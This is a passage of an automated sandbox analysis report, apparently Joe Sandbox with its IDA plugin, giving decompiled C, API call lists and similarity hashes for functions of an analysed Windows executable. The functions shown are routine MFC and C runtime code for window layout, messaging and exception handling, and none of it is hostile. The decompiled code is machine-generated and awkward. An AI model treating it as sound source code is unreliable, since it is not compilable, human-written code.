                  					if(_a4 != 0) {
                  						_t9 = 0xffffffff;
                  						SetLastError(0x78);
                  					}
                  				} else {
                  					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
                  				}
                  				return _t9;
                  			}








                  APIs
                  • GetModuleHandleA.KERNEL32(GDI32.DLL), ref: 004140D0
                  • GetProcAddress.KERNEL32(00000000,SetLayout), ref: 004140DE
                  • SetLastError.KERNEL32(00000078), ref: 004140FE
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AddressErrorHandleLastModuleProc
                  • String ID: GDI32.DLL$SetLayout
                  • API String ID: 4275029093-2147214759
                  • Opcode ID: 9b8d473c49fd3d84b58b9c99d83dfb1e7220dbfadac609eefbe553beeae09c5b
                  • Instruction ID: 8a1877a12cc709a5d7521cbc8d40f6a619cdb90c90200ff629e2cffd0f3fbba5
                  • Opcode Fuzzy Hash: 9b8d473c49fd3d84b58b9c99d83dfb1e7220dbfadac609eefbe553beeae09c5b
                  • Instruction Fuzzy Hash: 78E0223328020077C3204B5AAC48D9B7F16D7D87717294232F669C22A0CB7A8891876A
                  Uniqueness

                  Uniqueness Score: 1.44%

                  C-Code - Quality: 74%
                  			E0042C7A5(void* __edx, void* __esi, intOrPtr* _a4) {
                  				signed int _v8;
                  				intOrPtr _t11;
                  				intOrPtr* _t15;
                  				intOrPtr* _t19;
                  				void* _t23;
                  				void* _t25;
                  
                  				_t26 = __esi;
                  				_t24 = __edx;
                  				_t11 =  *((intOrPtr*)( *_a4));
                  				if(_t11 == 0xe0434f4d) {
                  					__eflags =  *((intOrPtr*)(E0042C35A(_t23, __edx, _t25, __eflags) + 0x90));
                  					if(__eflags > 0) {
                  						_t15 = E0042C35A(_t23, __edx, _t25, __eflags) + 0x90;
                  						 *_t15 =  *_t15 - 1;
                  						__eflags =  *_t15;
                  					}
                  					goto L5;
                  				} else {
                  					_t32 = _t11 - 0xe06d7363;
                  					if(_t11 != 0xe06d7363) {
                  						L5:
                  						__eflags = 0;
                  						return 0;
                  					} else {
                  						 *(E0042C35A(_t23, __edx, _t25, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
                  						_push(8);
                  						_push(0x447da8);
                  						E00429338(_t23, _t25, __esi);
                  						_t19 =  *((intOrPtr*)(E0042C35A(_t23, __edx, _t25, _t32) + 0x78));
                  						if(_t19 != 0) {
                  							_v8 = _v8 & 0x00000000;
                  							 *_t19();
                  							_v8 = 0xfffffffe;
                  						}
                  						return E0042937D(E0043146A(_t23, _t24, _t25, _t26));
                  					}
                  				}
                  			}










                  APIs
                  • __getptd.LIBCMT ref: 0042C7BF
                    • Part of subcall function 0042C35A: __getptd_noexit.LIBCMT ref: 0042C35D
                    • Part of subcall function 0042C35A: __amsg_exit.LIBCMT ref: 0042C36A
                  • __getptd.LIBCMT ref: 0042C7D0
                  • __getptd.LIBCMT ref: 0042C7DE
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: __getptd$__amsg_exit__getptd_noexit
                  • String ID: MOC$csm
                  • API String ID: 803148776-1389381023
                  • Opcode ID: e68d7cd1e198b97307a70fb647dc714a812b58e3fc1a01e9a224ec87df6449d8
                  • Instruction ID: fcad132b85fcf5cb73d165f3e6deaf37bb2e77d3f6ffe6503b81c680af6763ec
                  • Opcode Fuzzy Hash: e68d7cd1e198b97307a70fb647dc714a812b58e3fc1a01e9a224ec87df6449d8
                  • Instruction Fuzzy Hash: 5AE01232740114CFC710E665E08572D3795AB88354F994997E809C7312D72CE8449986
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 68%
                  			E0041408A(signed int __ecx) {
                  				_Unknown_base(*)()* _t3;
                  				signed int _t7;
                  				signed int _t8;
                  
                  				_t7 = __ecx;
                  				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
                  				if(_t3 == 0) {
                  					_t8 = _t7 | 0xffffffff;
                  					SetLastError(0x78);
                  				} else {
                  					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
                  				}
                  				return _t8;
                  			}







                  APIs
                  • GetModuleHandleA.KERNEL32(GDI32.DLL,?,004252AE), ref: 00414094
                  • GetProcAddress.KERNEL32(00000000,GetLayout), ref: 004140A0
                  • SetLastError.KERNEL32(00000078), ref: 004140B8
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AddressErrorHandleLastModuleProc
                  • String ID: GDI32.DLL$GetLayout
                  • API String ID: 4275029093-2396518106
                  • Opcode ID: 84f47a06b23efee7638f15aa58e6b9f7435459d0723091dd8cd37d9d6e48611b
                  • Instruction ID: 9c48f639d147d7f876a1e740b46ecd304c219b4bcf680c8c785379c536c5c6a6
                  • Opcode Fuzzy Hash: 84f47a06b23efee7638f15aa58e6b9f7435459d0723091dd8cd37d9d6e48611b
                  • Instruction Fuzzy Hash: A4D0C23268532067D67027627D0CA432F849B887B171916617DA5D22E0CBA9CC40869E
                  Uniqueness

                  Uniqueness Score: 1.51%

                  C-Code - Quality: 100%
                  			E00424551(void* __ecx, void* __eflags, intOrPtr _a8) {
                  				signed int _v8;
                  				struct tagRECT _v24;
                  				void* __ebx;
                  				void* __edi;
                  				signed int _t44;
                  				signed int _t48;
                  				signed int _t52;
                  				signed int _t57;
                  				void* _t64;
                  				signed int _t67;
                  				void* _t75;
                  				void* _t76;
                  				signed int _t78;
                  				void* _t80;
                  
                  				_t80 = __eflags;
                  				_t75 = __ecx;
                  				_v8 = E00411D59(__ecx);
                  				GetWindowRect( *(__ecx + 0x20),  &_v24);
                  				_t67 = GetSystemMetrics(0x21);
                  				_t78 = GetSystemMetrics(0x20);
                  				_t76 = E0040E168(_t67, _t75, _t75, _t80);
                  				if((_v8 & 0x00001000) == 0) {
                  					L5:
                  					__eflags = _t76 - 0xa;
                  					if(_t76 < 0xa) {
                  						L7:
                  						__eflags = _t76 - 4;
                  						if(_t76 != 4) {
                  							L16:
                  							return _t76;
                  						}
                  						L8:
                  						__eflags = _v8 & 0x00000800;
                  						if((_v8 & 0x00000800) == 0) {
                  							InflateRect( &_v24,  ~_t78,  ~_t67);
                  							__eflags = _v8 & 0x00000200;
                  							if((_v8 & 0x00000200) == 0) {
                  								goto L16;
                  							}
                  							_t44 = _t76 - 4;
                  							__eflags = _t44;
                  							if(_t44 == 0) {
                  								L21:
                  								__eflags = _a8 - _v24.bottom;
                  								return 0xb + (0 | _a8 - _v24.bottom > 0x00000000) * 4;
                  							}
                  							_t48 = _t44 - 9;
                  							__eflags = _t48;
                  							if(_t48 == 0) {
                  								__eflags = _a8 - _v24.top;
                  								return (0 | _a8 - _v24.top < 0x00000000) + (0 | _a8 - _v24.top < 0x00000000) + 0xa;
                  							}
                  							_t52 = _t48 - 1;
                  							__eflags = _t52;
                  							if(_t52 == 0) {
                  								__eflags = _a8 - _v24.top;
                  								return (0 | _a8 - _v24.top < 0x00000000) + 0xb;
                  							}
                  							_t57 = _t52;
                  							__eflags = _t57;
                  							if(_t57 == 0) {
                  								__eflags = _a8 - _v24.bottom;
                  								return ((0 | _a8 - _v24.bottom <= 0x00000000) - 0x00000001 & 0x00000005) + 0xa;
                  							}
                  							__eflags = _t57 == 1;
                  							if(_t57 == 1) {
                  								goto L21;
                  							}
                  							goto L16;
                  						}
                  						_t64 = 2;
                  						return _t64;
                  					}
                  					__eflags = _t76 - 0x11;
                  					if(_t76 <= 0x11) {
                  						goto L8;
                  					}
                  					goto L7;
                  				}
                  				if(_t76 == 3) {
                  					_t76 = 2;
                  				}
                  				if(GetKeyState(2) >= 0) {
                  					goto L5;
                  				} else {
                  					return 0;
                  				}
                  			}


















                  APIs
                    • Part of subcall function 00411D59: GetWindowLongW.USER32(?,000000F0), ref: 00411D64
                  • GetWindowRect.USER32(?,?), ref: 0042456D
                  • GetSystemMetrics.USER32(00000021), ref: 0042457B
                  • GetSystemMetrics.USER32(00000020), ref: 00424581
                  • GetKeyState.USER32(00000002), ref: 004245A1
                  • InflateRect.USER32(?,00000000,00000000), ref: 004245D7
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MetricsRectSystemWindow$InflateLongState
                  • String ID:
                  • API String ID: 2406722796-0
                  • Opcode ID: ca3daba9ae1a4b918d923478c38b4788f41cffe7335a79f934fba51ee3e13cd1
                  • Instruction ID: 8ad1fee93d3276f89ab2700491bb55a06857219860de39e348c3690f2fea8962
                  • Opcode Fuzzy Hash: ca3daba9ae1a4b918d923478c38b4788f41cffe7335a79f934fba51ee3e13cd1
                  • Instruction Fuzzy Hash: CA312932700138BBDB20CBA8E94DAAF77A4EFC5354F854027E146D7290D6BCCD81C669
                  Uniqueness

                  Uniqueness Score: 1.59%

                  C-Code - Quality: 97%
                  			E0040EF17(signed int __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags) {
                  				struct HWND__* _t29;
                  				signed int _t32;
                  				signed int _t36;
                  				signed int _t38;
                  				struct HWND__* _t53;
                  				void* _t54;
                  				void* _t55;
                  
                  				_t55 = __eflags;
                  				_t42 = __ebx;
                  				_push(0x80);
                  				E0042922B(E004389B9, __ebx, __edi, __esi);
                  				 *(_t54 - 0x10) = __ecx;
                  				E0041187F(_t54 - 0x38);
                  				_t45 = _t54 - 0x8c;
                  				E0040CD71(_t54 - 0x8c, _t55);
                  				 *(_t54 - 4) = 0;
                  				_t29 = GetTopWindow( *(__ecx + 0x20));
                  				while(1) {
                  					_t53 = _t29;
                  					if(_t53 == 0) {
                  						break;
                  					}
                  					 *(_t54 - 0x6c) = _t53;
                  					 *((intOrPtr*)(_t54 - 0x34)) = GetDlgCtrlID(_t53);
                  					 *((intOrPtr*)(_t54 - 0x24)) = _t54 - 0x8c;
                  					_t32 = E0040E23A(_t42, _t45, 0, _t53, __eflags, _t53);
                  					__eflags = _t32;
                  					if(_t32 == 0) {
                  						L3:
                  						_t45 =  *(_t54 - 0x10);
                  						__eflags = E00411700( *(_t54 - 0x10), 0, _t53,  *((intOrPtr*)(_t54 - 0x34)), 0xffffffff, _t54 - 0x38, 0);
                  						if(__eflags == 0) {
                  							_t42 =  *(_t54 + 0xc);
                  							__eflags = _t42;
                  							if(_t42 != 0) {
                  								_t36 = SendMessageW( *(_t54 - 0x6c), 0x87, 0, 0);
                  								__eflags = _t36 & 0x00002000;
                  								if((_t36 & 0x00002000) == 0) {
                  									L10:
                  									_t42 = 0;
                  									__eflags = 0;
                  								} else {
                  									_t38 = E00411D59(_t54 - 0x8c) & 0x0000000f;
                  									__eflags = _t38 - 3;
                  									if(_t38 == 3) {
                  										goto L10;
                  									} else {
                  										__eflags = _t38 - 6;
                  										if(_t38 == 6) {
                  											goto L10;
                  										} else {
                  											__eflags = _t38 - 7;
                  											if(_t38 == 7) {
                  												goto L10;
                  											} else {
                  												__eflags = _t38 - 9;
                  												if(_t38 == 9) {
                  													goto L10;
                  												}
                  											}
                  										}
                  									}
                  								}
                  							}
                  							_t45 = _t54 - 0x38;
                  							E004118A5(_t54 - 0x38,  *((intOrPtr*)(_t54 + 8)), _t42);
                  						}
                  					} else {
                  						_t45 = _t32;
                  						__eflags = E00411700(_t32, 0, _t53, 0, 0xbd11ffff, _t54 - 0x38, 0);
                  						if(__eflags == 0) {
                  							goto L3;
                  						}
                  					}
                  					_t29 = GetWindow(_t53, 2);
                  				}
                  				_t21 = _t54 - 4;
                  				 *(_t54 - 4) =  *(_t54 - 4) | 0xffffffff;
                  				 *(_t54 - 0x6c) = 0;
                  				return E00429303(E0040EBF1(_t42, _t54 - 0x8c, 0, _t53,  *_t21));
                  			}











                  APIs
                  • __EH_prolog3.LIBCMT ref: 0040EF21
                  • GetTopWindow.USER32(?), ref: 0040EF46
                  • GetDlgCtrlID.USER32(00000000), ref: 0040EF55
                  • SendMessageW.USER32(00000087,00000087,00000000,00000000), ref: 0040EFAE
                  • GetWindow.USER32(00000000,00000002), ref: 0040EFEE
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$CtrlH_prolog3MessageSend
                  • String ID:
                  • API String ID: 849854284-0
                  • Opcode ID: 0a795099d67d4c8b7fb90eb729637051ed253cc4281b446870ccc4f83d384e72
                  • Instruction ID: 23955d3deb9ab69ed9e018f6d661c27fe23f5ecedeeefac865633031ef26d70c
                  • Opcode Fuzzy Hash: 0a795099d67d4c8b7fb90eb729637051ed253cc4281b446870ccc4f83d384e72
                  • Instruction Fuzzy Hash: E621D531900115BBCB21ABA2DC84EEEBA79AF51314F10463BF451F22E1EB788D50CB19
                  Uniqueness

                  Uniqueness Score: 0.90%

                  C-Code - Quality: 68%
                  			E00416080(void* __ecx, unsigned int _a4) {
                  				void* __ebp;
                  				struct HWND__* _t20;
                  				void* _t23;
                  				void* _t27;
                  				void* _t34;
                  				struct HWND__* _t35;
                  
                  				_t28 = __ecx;
                  				_t34 = __ecx;
                  				if((E00411D59(__ecx) & 0x40000000) == 0) {
                  					_t28 = __ecx;
                  					_t27 = E0040ED5B(__ecx);
                  				} else {
                  					_t27 = __ecx;
                  				}
                  				if(_t27 == 0) {
                  					E00413DD0(_t28);
                  				}
                  				if((_a4 & 0x0000000c) != 0) {
                  					_t23 = E00411E53(_t27);
                  					if(( !(_a4 >> 3) & 0x00000001) == 0 || _t23 == 0 || _t27 == _t34) {
                  						SendMessageW( *(_t27 + 0x20), 0x86, 0, 0);
                  					} else {
                  						 *(_t34 + 0x3c) =  *(_t34 + 0x3c) | 0x00000200;
                  						SendMessageW( *(_t27 + 0x20), 0x86, 1, 0);
                  						 *(_t34 + 0x3c) =  *(_t34 + 0x3c) & 0xfffffdff;
                  					}
                  				}
                  				_push(5);
                  				_push(GetDesktopWindow());
                  				while(1) {
                  					_t20 = GetWindow();
                  					_t35 = _t20;
                  					if(_t35 == 0) {
                  						break;
                  					}
                  					if(E004156A7( *(_t27 + 0x20), _t35) != 0) {
                  						SendMessageW(_t35, 0x36d, _a4, 0);
                  					}
                  					_push(2);
                  					_push(_t35);
                  				}
                  				return _t20;
                  			}










                  APIs
                    • Part of subcall function 00411D59: GetWindowLongW.USER32(?,000000F0), ref: 00411D64
                  • SendMessageW.USER32(?,00000086,00000001,00000000), ref: 004160E7
                  • SendMessageW.USER32(?,00000086,00000000,00000000), ref: 004160FE
                  • GetDesktopWindow.USER32 ref: 00416102
                  • SendMessageW.USER32(00000000,0000036D,0000000C,00000000), ref: 00416123
                  • GetWindow.USER32(00000000), ref: 00416128
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MessageSendWindow$DesktopLong
                  • String ID:
                  • API String ID: 2272707703-0
                  • Opcode ID: 23fe42bd3d8f3eba715d88e7df0d1a97e5c6a75ef240f5eaa96edcbcaf8a8129
                  • Instruction ID: c83a090748aa953fd499e661a2ba550c24a20b093e05f380a44fd785bca14097
                  • Opcode Fuzzy Hash: 23fe42bd3d8f3eba715d88e7df0d1a97e5c6a75ef240f5eaa96edcbcaf8a8129
                  • Instruction Fuzzy Hash: 3711E73134071577EB316B528C46FEB3E58AF88750F22412EFE46591E2CAEDDC818A9D
                  Uniqueness

                  Uniqueness Score: 0.63%

                  C-Code - Quality: 65%
                  			E004167E7(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __eflags, struct HWND__* _a4, unsigned int _a8) {
                  				signed int _v8;
                  				short _v528;
                  				struct HWND__* _v532;
                  				intOrPtr _v536;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t22;
                  				int _t28;
                  				unsigned int _t48;
                  				void* _t51;
                  				void* _t54;
                  				intOrPtr _t55;
                  				void* _t56;
                  				signed int _t60;
                  
                  				_t52 = __edi;
                  				_t51 = __edx;
                  				_t42 = __ebx;
                  				_t58 = _t60;
                  				_t22 =  *0x44c364; // 0xa6e2bca1
                  				_v8 = _t22 ^ _t60;
                  				_push(_t54);
                  				_v536 = __ecx;
                  				_v532 = _a4;
                  				_t55 =  *((intOrPtr*)(E0042083D(__ebx, __edi, _t54, __eflags) + 4));
                  				if(_t55 != 0 && _a8 != 0) {
                  					_t48 = _a8 >> 0x10;
                  					if(_t48 != 0) {
                  						_t28 =  *(_t55 + 0x90) & 0x0000ffff;
                  						if(_a8 == _t28 && _t48 ==  *(_t55 + 0x92)) {
                  							_push(__ebx);
                  							_push(__edi);
                  							GlobalGetAtomNameW(_t28,  &_v528, 0x103);
                  							GlobalAddAtomW( &_v528);
                  							GlobalGetAtomNameW( *(_t55 + 0x92) & 0x0000ffff,  &_v528, 0x103);
                  							GlobalAddAtomW( &_v528);
                  							SendMessageW(_v532, 0x3e4,  *(_v536 + 0x20), ( *(_t55 + 0x92) & 0x0000ffff) << 0x00000010 |  *(_t55 + 0x90) & 0x0000ffff);
                  							_pop(_t52);
                  							_pop(_t42);
                  						}
                  					}
                  				}
                  				_pop(_t56);
                  				return E00427DFF(0, _t42, _v8 ^ _t58, _t51, _t52, _t56);
                  			}


















                  APIs
                  • GlobalGetAtomNameW.KERNEL32(?,?,00000103), ref: 00416861
                  • GlobalAddAtomW.KERNEL32(?), ref: 00416870
                  • GlobalGetAtomNameW.KERNEL32(?,?,00000103), ref: 00416886
                  • GlobalAddAtomW.KERNEL32(?), ref: 0041688F
                  • SendMessageW.USER32(?,000003E4,?,?), ref: 004168B9
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AtomGlobal$Name$MessageSend
                  • String ID:
                  • API String ID: 1515195355-0
                  • Opcode ID: 29d717807fa5eeaad5de7a24922560dc45065d342d5ea1433e51b370e337bfb0
                  • Instruction ID: 0223c1e0545b926e36b923c21b22c10fa7ba75f6f6dc1c9a7f5113cf425a893b
                  • Opcode Fuzzy Hash: 29d717807fa5eeaad5de7a24922560dc45065d342d5ea1433e51b370e337bfb0
                  • Instruction Fuzzy Hash: 94216271901218AADB20EF69D888BEAB7F8FF18700F41449AF55997181D778DE84CB54
                  Uniqueness

                  Uniqueness Score: 0.57%

                  C-Code - Quality: 100%
                  			E0041934C(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
                  				signed short _t24;
                  				unsigned int _t34;
                  				void* _t46;
                  
                  				_t46 = __ecx;
                  				if(IsWindow( *(__ecx + 0x20)) == 0) {
                  					 *(_t46 + 0xb0) = _a4;
                  					 *(_t46 + 0xb4) = _a8;
                  					 *(_t46 + 0xa8) = _a12;
                  					_t24 = _a16;
                  					 *(_t46 + 0xac) = _t24;
                  					return _t24;
                  				}
                  				SendMessageW( *(_t46 + 0x20), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
                  				SendMessageW( *(_t46 + 0x20), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
                  				if( *0x44be94 >= 0x60000) {
                  					_t34 = SendMessageW( *(_t46 + 0x20), 0x43a, 0, 0);
                  					 *(_t46 + 0xb0) = _t34 & 0x0000ffff;
                  					 *(_t46 + 0xb4) = _t34 >> 0x10;
                  				}
                  				return InvalidateRect( *(_t46 + 0x20), 0, 1);
                  			}







                  APIs
                  • IsWindow.USER32(?), ref: 00419357
                  • SendMessageW.USER32(?,00000420,00000000,004067C9), ref: 00419382
                  • SendMessageW.USER32(?,0000041F,00000000,?), ref: 0041939B
                  • SendMessageW.USER32(?,0000043A,00000000,00000000), ref: 004193B3
                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004193CD
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MessageSend$InvalidateRectWindow
                  • String ID:
                  • API String ID: 3225880595-0
                  • Opcode ID: 9af390a8ecad5481a4b659e189a4c7134cd6d35ed7579780a7988a569e019a23
                  • Instruction ID: 101ffce84f5f284ade85b2655d22097d4b946a2c00a2f5c631093cb60535d383
                  • Opcode Fuzzy Hash: 9af390a8ecad5481a4b659e189a4c7134cd6d35ed7579780a7988a569e019a23
                  • Instruction Fuzzy Hash: 3A11E9B1100718AFE7108F29DC84ABBB7E9FB48755F00452AF9DAC6261D7B0EC50DB65
                  Uniqueness

                  Uniqueness Score: 1.69%

                  C-Code - Quality: 75%
                  			E004208C1(void* __ecx, void* __edx, struct HWND__* _a4, WCHAR* _a8) {
                  				signed int _v8;
                  				char _v518;
                  				short _v520;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t9;
                  				struct HWND__* _t23;
                  				void* _t24;
                  				void* _t25;
                  				void* _t28;
                  				int _t30;
                  				void* _t31;
                  				WCHAR* _t33;
                  				void* _t34;
                  				signed int _t38;
                  
                  				_t28 = __edx;
                  				_t25 = __ecx;
                  				_t36 = _t38;
                  				_t9 =  *0x44c364; // 0xa6e2bca1
                  				_v8 = _t9 ^ _t38;
                  				_t23 = _a4;
                  				_t33 = _a8;
                  				if(_t23 == 0) {
                  					L2:
                  					E00413DD0(_t25);
                  				}
                  				if(_t33 == 0) {
                  					goto L2;
                  				}
                  				_t30 = lstrlenW(_t33);
                  				_v520 = 0;
                  				E004281D0(_t30,  &_v518, 0, 0x1fe);
                  				if(_t30 > 0x100 || GetWindowTextW(_t23,  &_v520, 0x100) != _t30 || lstrcmpW( &_v520, _t33) != 0) {
                  					_t17 = SetWindowTextW(_t23, _t33);
                  				}
                  				_pop(_t31);
                  				_pop(_t34);
                  				_pop(_t24);
                  				return E00427DFF(_t17, _t24, _v8 ^ _t36, _t28, _t31, _t34);
                  			}





















                  APIs
                  • lstrlenW.KERNEL32(?,00000000,0044B1B0,?), ref: 004208ED
                  • _memset.LIBCMT ref: 0042090B
                  • GetWindowTextW.USER32(00000104,?,00000100), ref: 00420925
                  • lstrcmpW.KERNEL32(?,?), ref: 00420937
                  • SetWindowTextW.USER32(00000104,?), ref: 00420943
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                  • String ID:
                  • API String ID: 289641511-0
                  • Opcode ID: 54357dcbbb036a46dd303e13e8abc5eea3e83e89d7dba8016e5c7abb3c8778c1
                  • Instruction ID: db58640a3672f31761ff3a36ee070ed53be501f73f13427cb5e152126002881c
                  • Opcode Fuzzy Hash: 54357dcbbb036a46dd303e13e8abc5eea3e83e89d7dba8016e5c7abb3c8778c1
                  • Instruction Fuzzy Hash: 300188B6701228A7DB10EB65EC88DDF73ACEF44750F404066F916D3242EA749D448BA9
                  Uniqueness

                  Uniqueness Score: 1.31%

                  C-Code - Quality: 100%
                  			E00415EF5(void* __ecx) {
                  				struct tagMSG _v32;
                  				void* __ebp;
                  				void* _t9;
                  				void* _t13;
                  				void* _t26;
                  
                  				_t26 = __ecx;
                  				if( *((intOrPtr*)(__ecx + 0x68)) != 0) {
                  					if(PeekMessageW( &_v32,  *(__ecx + 0x20), 0x367, 0x367, 3) == 0) {
                  						PostMessageW( *(_t26 + 0x20), 0x367, 0, 0);
                  					}
                  					if(GetCapture() ==  *(_t26 + 0x20)) {
                  						ReleaseCapture();
                  					}
                  					_t13 = E0040ED5B(_t26);
                  					if(_t13 == 0) {
                  						_t13 = E00413DD0(0);
                  					}
                  					 *((intOrPtr*)(_t26 + 0x68)) = 0;
                  					 *((intOrPtr*)(_t13 + 0x68)) = 0;
                  					return PostMessageW( *(_t26 + 0x20), 0x36a, 0, 0);
                  				}
                  				return _t9;
                  			}









                  APIs
                  • PeekMessageW.USER32(?,?,00000367,00000367,00000003), ref: 00415F18
                  • PostMessageW.USER32(?,00000367,00000000,00000000), ref: 00415F30
                  • GetCapture.USER32 ref: 00415F32
                  • ReleaseCapture.USER32 ref: 00415F3D
                  • PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 00415F65
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Message$CapturePost$PeekRelease
                  • String ID:
                  • API String ID: 1125932295-0
                  • Opcode ID: b4efaf5bf7a7d62b4cd52e50aabfed2fe0d1a9a570ed75070f108986fe1d223b
                  • Instruction ID: 98ce2f8058313793ab154f956a24899c7494b88785dc1d587778baef9f87d411
                  • Opcode Fuzzy Hash: b4efaf5bf7a7d62b4cd52e50aabfed2fe0d1a9a570ed75070f108986fe1d223b
